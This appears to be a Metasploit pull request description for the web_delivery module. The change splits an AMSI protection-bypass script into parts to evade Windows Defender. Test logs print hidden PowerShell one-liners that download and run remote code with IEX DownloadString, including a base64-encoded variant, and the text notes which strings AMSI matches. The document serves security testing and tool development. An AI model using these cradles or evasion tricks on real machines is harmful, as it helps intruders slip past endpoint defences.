Note that the GraphML file used to generate the Powershell protection bypass code (`bypass_powershell_protections.erb.graphml`) has been updated to be compatible with splitting. Particularly, big `If` blocks were removed in favor of independent lines of code. This was necessary to be able to split the script in multiple pieces without breaking the logic.

## Misc
During testing, I noticed that the literal string `amsiInitFailed` seems to be what AMSI matches for detection. Therefore, the obfuscation threshold for this string has been increased.

Also, the module was delivering the bypass powershell protections script twice when the `PSH-AmsiBypass` was set to `true`. To avoid this,  the `Powershell::prepend_protections_bypass` option is now forced to `false` when the `PSH-AmsiBypass` option is set.

Finally, the code responsible for forcing TLS v1.2 was always prepended, regardless of having SSL set or not. This has been fixed by perpending this code only when SSL is used.

# Testing
## Environment Setup
Taken from this [PR](https://github.com/rapid7/metasploit-framework/pull/15254) description.

This has been tested on Windows 11 2H22 with the latest security updates.
![Screenshot 2023-04-27 at 15 11 18](https://user-images.githubusercontent.com/56716719/234888356-6bfff675-c4cb-4faa-80e0-f5a1ebff0b10.png)
![Screenshot 2023-04-27 at 15 11 11](https://user-images.githubusercontent.com/56716719/234888385-e44b92a8-8cc8-4001-ae94-37194aa56e9e.png)

Within the Security settings, the following should be configured unless otherwise specified:

- Real-time protection On
  - This is the only setting that needs to be toggled on and off for testing purposes
- Cloud-delivered protection Off
- Automatic sample submission Off
- Tamper Protection On

AV / EDR solutions [other than](https://github.com/subat0mik/whoamsi) Windows Defender were not tested.

## Steps
- [ ] Start msfconsole
- [ ] Run: `use exploit/multi/script/web_delivery`
- [ ] Run: `set target 2` to select the PSH target
- [ ] Run: `set payload payload/windows/x64/exec` which seems to be the only payload that doesn't get blocked by the "behavior" detection logic of Windows Defender (not AMSI)
- [ ] Run: `set cmd calc.exe`
- [ ] Run: `set SSL true`
- [ ] Run: `set SRVHOST <IP of the local server>` The default 0.0.0.0 cannot be used since SSL is used
- [ ] Run: `set verbose true`
- [ ] Run: `exploit`

Make sure the `calc.exe` is launched on the target.

Repeat these steps setting the `PSH-AmsiBypassSplit` option to any value greater than 1.

# Scenarios

## Before
```
msf6 exploit(multi/script/web_delivery) > set target 2
target => 2
msf6 exploit(multi/script/web_delivery) > set payload payload/windows/x64/exec
payload => windows/x64/exec
msf6 exploit(multi/script/web_delivery) > set cmd calc.exe
cmd => calc.exe
msf6 exploit(multi/script/web_delivery) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(multi/script/web_delivery) > set SRVHOST 192.168.100.1
SRVHOST => 192.168.100.1
msf6 exploit(multi/script/web_delivery) > set verbose true
verbose => true
msf6 exploit(multi/script/web_delivery) > options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.100.1    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      true             no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/x64/exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD       calc.exe         yes       The command string to execute
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)


Exploit target:

   Id  Name
   --  ----
   2   PSH



View the full module info with the info, or info -d command.

msf6 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) >
[*] Using URL: https://192.168.100.1:8080/vbzwK4GZbe
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAPQB7ACQAdAByAHUAZQB9ADsAJABvAE4ASABFAEIAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAbwBOAEgARQBCAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAbwBOAEgARQBCAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAzADMALgAxADoAOAAwADgAMAAvAHYAYgB6AHcASwA0AEcAWgBiAGUALwBvADEAVAA2AGgAWgAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAzADMALgAxADoAOAAwADgAMAAvAHYAYgB6AHcASwA0AEcAWgBiAGUAJwApACkAOwA=
```
![Screenshot 2023-04-27 at 15 11 04](https://user-images.githubusercontent.com/56716719/234888456-1df542ed-ac54-43cd-bbfb-0e8a0a46e32a.png)

## After
```
msf6 exploit(multi/script/web_delivery) > set target 2
target => 2
msf6 exploit(multi/script/web_delivery) > set payload payload/windows/x64/exec
payload => windows/x64/exec
msf6 exploit(multi/script/web_delivery) > set cmd calc.exe
cmd => calc.exe
msf6 exploit(multi/script/web_delivery) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(multi/script/web_delivery) > set SRVHOST 192.168.100.1
SRVHOST => 192.168.100.1
msf6 exploit(multi/script/web_delivery) > set verbose true
verbose => true
msf6 exploit(multi/script/web_delivery) > options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.100.1    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      true             no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/x64/exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD       calc.exe         yes       The command string to execute
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)


Exploit target:

   Id  Name
   --  ----
   2   PSH



View the full module info with the info, or info -d command.

msf6 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) >
[*] Using URL: https://192.168.100.1:8080/2muVRuo
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};IEX ((new-object Net.WebClient).DownloadString('https://192.168.100.1:8080/2muVRuo/278YksjkvjT1hE'));IEX ((new-object Net.WebClient).DownloadString('https://192.168.100.1:8080/2muVRuo/F3wVTh'));IEX ((new-object Net.WebClient).DownloadString('https://192.168.100.1:8080/2muVRuo/zKvShJA2'));IEX ((new-object Net.WebClient).DownloadString('https://192.168.100.1:8080/2muVRuo'));
[*] 192.168.100.1    web_delivery - Delivering ForceTLS12 command (78 bytes)
[*] 192.168.100.1    web_delivery - Delivering Proxy Aware command (203 bytes)
[*] 192.168.100.1    web_delivery - Delivering AMSI Bypass 1/1(1651 bytes)
[*] 192.168.100.1    web_delivery - Powershell command length: 2049
[*] 192.168.100.1    web_delivery - Delivering Payload (2049 bytes)
```


## Splitting the protection bypass script

```
msf6 exploit(multi/script/web_delivery) > set PSH-AmsiBypassSplit 5
PSH-AmsiBypassSplit => 5
msf6 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) >
[*] Using URL: https://192.168.100.1:8080/FOoWfRNYGZC
[*] Server started.
[*] Run the following command on the target machine:
[*] Splitting bypass protection script in 5 parts
powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};IEX ((new-object Net.WebClient).DownloadString('https://192.168.100.1:8080/FOoWfRNYGZC/GR0HrhkjIqL'));IEX ((new-object Net.WebClient).DownloadString('https://192.168.100.1:8080/FOoWfRNYGZC/S2YXkB'));IEX ((new-object Net.WebClient).DownloadString('https://192.168.100.1:8080/FOoWfRNYGZC/aUS8gMNgzoW'));IEX ((new-object Net.WebClient).DownloadString('https://192.168.100.1:8080/FOoWfRNYGZC/aUS8gMNgzoW'));IEX ((new-object Net.WebClient).DownloadString('https://192.168.100.1:8080/FOoWfRNYGZC/aUS8gMNgzoW'));IEX ((new-object Net.WebClient).DownloadString('https://192.168.100.1:8080/FOoWfRNYGZC/aUS8gMNgzoW'));IEX ((new-object Net.WebClient).DownloadString('https://192.168.100.1:8080/FOoWfRNYGZC/aUS8gMNgzoW'));IEX ((new-object Net.WebClient).DownloadString('https://192.168.100.1:8080/FOoWfRNYGZC'));
[*] 192.168.100.1    web_delivery - Delivering ForceTLS12 command (78 bytes)
[*] 192.168.100.1    web_delivery - Delivering Proxy Aware command (203 bytes)
[*] 192.168.100.1    web_delivery - Delivering AMSI Bypass 1/5(1131 bytes)
[*] 192.168.100.1    web_delivery - Delivering AMSI Bypass 2/5(128 bytes)
[*] 192.168.100.1    web_delivery - Delivering AMSI Bypass 3/5(49 bytes)
[*] 192.168.100.1    web_delivery - Delivering AMSI Bypass 4/5(49 bytes)
[*] 192.168.100.1    web_delivery - Delivering AMSI Bypass 5/5(252 bytes)
[*] 192.168.100.1    web_delivery - Powershell command length: 2091
[*] 192.168.100.1    web_delivery - Delivering Payload (2091 bytes)
```
![Screenshot 2023-04-27 at 15 14 16](https://user-images.githubusercontent.com/56716719/234888484-f2cdb2d9-3c36-4e72-984a-59cac8eab5e4.png)

# Code Review
The issues reported by rubocup for the `web_delivery` module were addressed in a separate commit to ease the review process.